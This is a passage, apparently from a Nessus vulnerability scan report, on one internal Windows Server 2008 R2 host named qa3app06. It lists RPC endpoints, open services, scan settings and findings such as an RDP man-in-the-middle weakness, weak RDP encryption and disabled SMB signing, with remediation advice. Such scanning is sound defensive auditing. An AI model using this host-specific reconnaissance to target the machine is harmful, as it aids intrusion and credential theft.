d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E030 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E030 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 3bdb59a0-d736-4d44-9074-c1ee00000001 +UUID : 24019106-a203-4642-b88d-82dae9158929, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : LRPC-a3d204163ab8f1bd38 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc0387DC1 + +Object UUID : 6d726574-7273-0076-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : LRPC-2289a2c9caf5de05a0 + +Object UUID : 26780f03-9349-4d59-85fc-0a2da9179ba0 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-f6f951764b738fd7db + +Object UUID : d26f0f81-7ba7-4a13-919e-42526c6a9f92 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-f6f951764b738fd7db + +Object UUID : f8483b70-d48f-4924-9439-42573bdc6227 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-f6f951764b738fd7db + +Object UUID : 2b618ee1-3945-4779-8a54-8478a4f20e14 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-f6f951764b738fd7db + +Object UUID : 531341f7-81cb-48da-ac5c-fb5d93bdf208 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : OLED523FADBF00A433F9744BF0D726C + +Object UUID : 531341f7-81cb-48da-ac5c-fb5d93bdf208 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-c20380b4232caf3c79 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Local RPC service +Named pipe : LRPC-25f66b059e7337a520 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LRPC-a1e7cd726e2a61e910 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : audit + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : securityevent + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LSARPC_ENDPOINT + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsapolicylookup + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsasspirpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : protected_storage + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : dsrole + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : samss lpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0 +Description : Unknown RPC service +Annotation : Spooler base remote object endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0 +Description : Unknown RPC service +Annotation : Base Firewall Engine API +Type : Local RPC service +Named pipe : LRPC-5e16c501f1d608e7b9 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-5e16c501f1d608e7b9 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-5e16c501f1d608e7b9 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : OLE7C214445480D41C6AC1CEF30755B + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : LRPC-bcad8b95fdb771ef46 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : OLE7C214445480D41C6AC1CEF30755B + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : LRPC-bcad8b95fdb771ef46 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : W32TIME_ALT + +Object UUID : 666f7270-6c69-7365-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 6c637067-6569-746e-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601 +UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE0D7EC00E68984D2CAE3E8AB8D62C + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE0D7EC00E68984D2CAE3E8AB8D62C + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE0D7EC00E68984D2CAE3E8AB8D62C + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE0D7EC00E68984D2CAE3E8AB8D62C + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE0D7EC00E68984D2CAE3E8AB8D62C + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : OLE0D7EC00E68984D2CAE3E8AB8D62C + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : OLE0D7EC00E68984D2CAE3E8AB8D62C + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : OLE0D7EC00E68984D2CAE3E8AB8D62C + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE0D7EC00E68984D2CAE3E8AB8D62C + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE0D7EC00E68984D2CAE3E8AB8D62C + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +An SMB server is running on this port. + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +A CIFS server is running on this port. + + + + +Mon Jul 1 11:47:23 2013 +1 +general-purpose +Microsoft Windows Server 2008 R2 Standard Service Pack 1 +00:50:56:81:01:df +10.31.112.26 +172.16.138.2 +10.31.112.26 +qa3app06 +QA3APP06 +Mon Jul 1 11:33:11 2013 + + +This script displays, for each tested host, information about the scan itself : + + - The version of the plugin set + - The type of plugin feed (HomeFeed or ProfessionalFeed) + - The version of the Nessus Engine + - The port scanner(s) used + - The port range scanned + - Whether credentialed or third-party patch management checks are possible + - The date of the scan + - The duration of the scan + - The number of hosts scanned in parallel + - The number of checks done in parallel +scan_info.nasl +2013/05/31 +Nessus Scan Information +2005/08/26 +summary +None +$Revision: 1.59 $ +n/a +Information about the Nessus scan. +Information about this scan : + +Nessus version : 5.2.1 +Plugin feed version : 201306260615 +Type of plugin feed : HomeFeed (Non-commercial use only) +Scanner IP : 172.16.138.174 +Port scanner(s) : nessus_syn_scanner +Port range : default +Thorough tests : no +Experimental tests : no +Paranoia level : 1 +Report Verbosity : 1 +Safe checks : yes +Optimize the test : yes +Credentialed checks : no +Patch management checks : None +CGI scanning : disabled +Web application tests : disabled +Max hosts : 80 +Max checks : 5 +Recv timeout : 5 +Backports : None +Allow post-scan editing: Yes +Scan Start Date : 2013/7/1 11:33 +Scan duration : 848 sec + + + +One of several ports that were previously open are now closed or unresponsive. + +There are several possible reasons for this : + + - The scan may have caused a service to freeze or stop running. + + - An administrator may have stopped a particular service during the scanning process. + +This might be an availability problem related to the following : + + - A network outage has been experienced during the scan, and the remote network cannot be reached anymore by the scanner. + + - This scanner may has been blacklisted by the system administrator or by an automatic intrusion detection / prevention system that detected the scan. + + - The remote host is now down, either because a user turned it off during the scan or because a select denial of service was effective. + +In any case, the audit of the remote host might be incomplete and may need to be done again +check_ports.nasl +2013/05/14 +Open Port Re-check +2002/03/19 +remote +None +$Revision: 1.41 $ +- Increase checks_read_timeout and/or reduce max_checks + +- Disable any IPS during the Nessus scan +Previously open ports are now closed. +Port 135 was detected as being open but is now unresponsive +Port 3389 was detected as being open but is now unresponsive +Port 80 was detected as being open but is now unresponsive + + + +Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc). +device_type.nasl +2011/05/23 +Device Type +2011/05/23 +combined +None +$Revision: 1.1 $ +n/a +It is possible to guess the remote device type. +Remote device type : general-purpose +Confidence level : 99 + + + +By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration) matches for various hardware and software products found on a host. + +Note that if an official CPE is not available for the product, this plugin computes the best possible CPE based on the information available from the scan. +cpe.nbin +2013/05/13 +Common Platform Enumeration (CPE) +2010/04/21 +local +None +$Revision: 1.19 $ +http://cpe.mitre.org/ +n/a +It is possible to enumerate CPE names that matched on the remote system. + +The remote operating system matched the following CPE : + + cpe:/o:microsoft:windows_server_2008:r2:sp1 -> Microsoft Windows Server 2008 R2 Service Pack 1 + +Following application CPE matched on the remote system : + + cpe:/a:microsoft:iis:7.5 -> Microsoft Internet Information Services (IIS) 7.5 + + + +Using a combination of remote probes (TCP/IP, SMB, HTTP, NTP, SNMP, etc...), it is possible to guess the name of the remote operating system in use. It is also sometimes possible to guess the version of the operating system. +os_fingerprint.nasl +2013/04/01 +OS Identification +2003/12/09 +combined +None +$Revision: 2.34 $ +n/a +It is possible to guess the remote operating system. + +Remote operating system : Microsoft Windows Server 2008 R2 Standard Service Pack 1 +Confidence Level : 99 +Method : MSRPC + + +The remote host is running Microsoft Windows Server 2008 R2 Standard Service Pack 1 + + +This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, etc... + +This test is informational only and does not denote any security problem. +http_info.nasl +2011/05/31 +HyperText Transfer Protocol (HTTP) Information +2007/01/30 +remote +None +$Revision: 1.12 $ +n/a +Some information about the remote HTTP configuration can be extracted. + +Protocol version : HTTP/1.1 +SSL : no +Keep-Alive : no +Options allowed : OPTIONS, TRACE, GET, HEAD, POST +Headers : + + Content-Type: text/html + Last-Modified: Tue, 01 May 2012 20:47:11 GMT + Accept-Ranges: bytes + ETag: "ca7a095db27cd1:0" + Server: Microsoft-IIS/7.5 + X-Powered-By: ASP.NET + Date: Mon, 01 Jul 2013 18:38:44 GMT + Content-Length: 689 + + + + +This plugin attempts to determine the type and the version of the remote web server. +http_version.nasl +2013/06/03 +HTTP Server Type and Version +2000/01/04 +remote +None +$Revision: 1.111 $ +n/a +A web server is running on the remote host. +The remote web server type is : + +Microsoft-IIS/7.5 + + +By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory. + +As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes' in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501. + +Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities. +web_directory_options.nasl +2013/05/09 +HTTP Methods Allowed (per directory) +2009/12/10 +remote +None +$Revision: 1.7 $ +n/a +This plugin determines which HTTP methods are allowed on various CGI directories. +Based on the response to an OPTIONS request : + + - HTTP methods GET HEAD POST TRACE OPTIONS are allowed on : + + / + + + + +Each ethernet MAC address starts with a 24-bit 'Organizationally Unique Identifier'. +These OUI are registered by IEEE. +ethernet_manufacturer.nasl +2011/03/27 +Ethernet Card Manufacturer Detection +2009/02/19 +combined +None +$Revision: 1.9 $ +http://standards.ieee.org/faqs/OUI.html +http://standards.ieee.org/regauth/oui/index.shtml +n/a +The manufacturer can be deduced from the Ethernet OUI. + +The following card manufacturers were identified : + +00:50:56:81:01:df : VMware, Inc. + + + +According to the MAC address of its network adapter, the remote host is a VMware virtual machine. + +Since it is physically accessible through the network, ensure that its configuration matches your organization's security policy. +vmware_detect.nasl +2011/03/27 +VMware Virtual Machine Detection +2005/10/27 +combined +None +$Revision: 1.24 $ +n/a +The remote host seems to be a VMware virtual machine. + + +13818 +CVE-2005-1794 +5.1 +4.6 +CVSS2#E:F/RL:W/RC:ND +CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P +The remote version of the Remote Desktop Protocol Server (Terminal Service) is vulnerable to a man-in-the-middle (MiTM) attack. The RDP client makes no effort to validate the identity of the server when setting up encryption. An attacker with the ability to intercept traffic from the RDP server can establish encryption with the client and server without being detected. A MiTM attack of this nature would allow the attacker to obtain any sensitive information transmitted, including authentication credentials. + +This flaw exists because the RDP server stores a hardcoded RSA private key in the mstlsapi.dll library. Any local user with access to this file (on any Windows system) can retrieve the key and use it for this attack. +true +Exploits are available +tssvc_mim.nasl +17131 +2012/03/30 +Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness +2005/06/01 +remote +Medium +$Revision: 1.23 $ +http://www.oxid.it/downloads/rdp-gbu.pdf +http://www.nessus.org/u?e2628096 +http://technet.microsoft.com/en-us/library/cc782610.aspx +- Force the use of SSL as a transport layer for this service if supported, or/and +- Select the 'Allow connections only from computers running Remote Desktop with Network Level Authentication' setting if it is available. +It may be possible to get access to the remote host. +2005/05/28 +OSVDB:17131 + + +The remote web server uses its default welcome page. It probably means that this server is not used at all or is serving content that is meant to be hidden. +www_default_page.nasl +2117 +2011/08/12 +Web Server Unconfigured - Default Install Page Present +2003/03/20 +remote +None +$Revision: 1.37 $ +Disable this service if you do not use it. +The remote web server is not configured or is not properly configured. +1994/01/01 +OSVDB:2117 + +The default welcome page is from IIS. + + + +cpe:/o:microsoft:windows +This script attempts to connect to the remote host via RDP (Remote Desktop Protocol) and attempts to take a screenshot of the login screen. + +While this is not a vulnerability by itself, some versions of Windows display the names of the users who can connect and which ones are connected already. +rdp_logon_screen.nbin +2013/05/08 +RDP Screenshot +2013/04/22 +remote +None +$Revision: 1.4 $ +n/a +It is possible to take a screenshot of the remote login screen. +It was possible to gather the following screenshot of the remote login screen. +293713fa5c0d44310392df3bf9c784a3 + + +4.3 +CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N +The remote Terminal Services service is not configured to use strong cryptography. + +Using weak cryptography with this service may allow an attacker to eavesdrop on the communications more easily and obtain screenshots and/or keystrokes. +rdp_weak_crypto.nbin +2013/04/22 +Terminal Services Encryption Level is Medium or Low +2012/01/25 +remote +Medium +$Revision: 1.6 $ +Change RDP encryption level to one of : + + 3. High + + 4. FIPS Compliant +The remote host is using weak cryptography. + +The terminal services encryption level is set to : + +2. Medium + + +2.6 +CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N +The encryption setting used by the remote Terminal Services service is not FIPS-140 compliant. +fips_rdp.nbin +2013/04/22 +Terminal Services Encryption Level is not FIPS-140 Compliant +2008/02/11 +remote +Low +$Revision: 1.9 $ +Change RDP encryption level to : + + 4. FIPS Compliant +The remote host is not FIPS-140 compliant. + +The terminal services encryption level is set to : + +2. Medium (Client Compatible) + + +Terminal Services allows a Windows user to remotely obtain a graphical login (and therefore act as a local user on the remote host). + +If an attacker gains a valid login and password, he may be able to use this service to gain further access on the remote host. An attacker may also use this service to mount a dictionary attack against the remote host to try to log in remotely. + +Note that RDP (the Remote Desktop Protocol) is vulnerable to Man-in-the-middle attacks, making it easy for attackers to steal the credentials of legitimate users by impersonating the Windows server. +windows_terminal_services.nasl +2012/03/30 +Windows Terminal Services Enabled +2002/04/20 +remote +None +$Revision: 1.29 $ +Disable Terminal Services if you do not use it, and do not allow this service to run across the Internet. +The remote Windows host has Terminal Services enabled. + + +cpe:/o:microsoft:windows +5.0 +CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N +Signing is disabled on the remote SMB server. This can allow man-in-the-middle attacks against the SMB server. +smb_signing_disabled.nasl +2012/03/05 +SMB Signing Disabled +2012/01/19 +remote +Medium +$Revision: 1.7 $ +http://support.microsoft.com/kb/887429 +http://www.nessus.org/u?74b80723 +http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html +Enforce message signing in the host's configuration. On Windows, this is found in the Local Security Policy. On Samba, the setting is called 'server signing'. See the 'see also' links for further details. +Signing is disabled on the remote SMB server. +2012/01/17 + + +It was possible to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request. +find_service.nasl +2013/05/12 +Service Detection +2007/08/19 +remote +None +$Revision: 1.123 $ +n/a +The remote service could be identified. +A web server is running on this port. + + +The name of this machine either does not resolve or resolves to a different IP address. + +This may come from a badly configured reverse DNS or from a host file in use on the Nessus scanning host. + +As a result, URLs in plugin output may not be directly usable in a web browser and some web tests may be incomplete. +bad_rdns.nasl +2011/10/06 +Inconsistent Hostname and IP Address +2010/05/03 +remote +None +1.6 +Fix the reverse DNS or host file. +The remote host's hostname is not consistent with DNS information. +The host name 'qa3app06' does not resolve to an IP address + + +Nessus was able to resolve the FQDN of the remote host. +fqdn.nasl +2012/09/28 +Host Fully Qualified Domain Name (FQDN) Resolution +2004/02/11 +remote +None +$Revision: 1.12 $ +n/a +It was possible to resolve the name of the remote host. + +10.31.112.26 resolves as qa3app06. + + + +Makes a traceroute to the remote host. +traceroute.nasl +2013/04/11 +Traceroute Information +1999/11/27 +remote +None +1.62 +n/a +It was possible to obtain traceroute information. +For your information, here is the traceroute from 172.16.138.174 to 10.31.112.26 : +172.16.138.174 +172.16.138.2 +10.31.112.26 + + + +cpe:/o:microsoft:windows +The Nessus scanner testing the remote host has been given SMB credentials to log into the remote host, however these credentials do not have administrative privileges. + +Typically, when Nessus performs a patch audit, it logs into the remote host and reads the version of the DLLs on the remote host to determine if a given patch has been applied or not. This is the method Microsoft recommends to determine if a patch has been applied. + +If your Nessus scanner does not have administrative privileges when doing a scan, then 